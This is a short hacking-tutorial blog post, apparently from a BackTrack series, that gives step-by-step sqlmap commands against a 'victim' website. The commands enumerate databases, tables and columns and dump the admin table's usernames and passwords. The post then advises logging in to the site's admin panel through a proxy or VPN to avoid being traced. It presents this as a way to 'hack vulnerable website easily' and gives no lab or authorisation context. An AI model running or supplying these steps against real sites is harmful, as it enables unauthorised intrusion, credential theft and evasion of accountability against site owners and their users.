So you can check all my tutorial on backtrack here if you are a new visitor.
So come to today's topic Sqlmap is a automatic sql injection tool which helps you to hack vulnerable website easily.
Now to know more on it must have some idea on sql injection .
Now Follow these simple steps to know effective use of this tool.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
So in this case the command will be
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns and we got username and password
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we have the username and the password of the website !
Now All you have to do is just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
Thanks For Reading Stay Tuned for many such tutorials :)
Post a Comment
Feel Free To Ask Your Query we Love To Answer